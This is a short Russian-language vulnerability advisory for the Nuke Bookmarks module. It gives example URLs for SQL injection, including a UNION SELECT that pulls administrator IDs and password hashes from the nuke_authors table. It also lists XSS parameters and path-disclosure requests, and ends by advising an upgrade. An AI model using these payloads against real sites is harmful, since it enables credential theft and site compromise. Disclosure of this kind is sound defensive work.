SQL-инъекция и межсайтовый скриптинг в Nuke Bookmarks

Описание:
Обнаруженная уязвимость позволяет удаленному пользователю произвести XSS нападение, получить данные об установочной директории приложения и выполнить произвольные SQL команды в базе данных уязвимого приложения.

1. SQL-инъекция существует из-за недостаточной фильтрации входных данных в параметре category модуля marks. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения. Пример:

http://[target]/modules.php?name=Bookmarks&file=marks&catna
me=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors

2. Межсайтовый скриптинг возможен из-за недостаточной фильтрации HTML тегов. Удаленный пользователь может создать специально сформированный URL и выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[target]/modules.php?name=Bookmarks&file=del_cat&catname=[htmlco de]
http://[target]/modules.php?name=Bookmarks&file=del_mark&markname=[htmlcode]
http://[target]/modules.php?name=Bookmarks&file=edit_cat&catname=[htmlcode]
http://[ta rget]/modules.php?name=Bookmarks&file=edit_cat&catcomment=[htmlcode]
http://[target]/modules.php?name=Bookmarks&file=marks&catname=[htmlcode]
http://[target]/modules.ph p?name=Bookmarks&file=uploadbookmarks&category=[htmlcode]

3. Удаленный пользователь может получить данные об установочной директории приложения из-за недостаточной обработки входных данных в некоторых параметрах модуля marks. Пример:

http://[target]/modules.php?name=Bookmarks&fil e=marks
http://[target]/modules.php?name=Bookmarks&file=marks&category=1\'

URL производителя: nukebookmarks.sourceforge.net

Решение: Установите последнюю версию от производителя.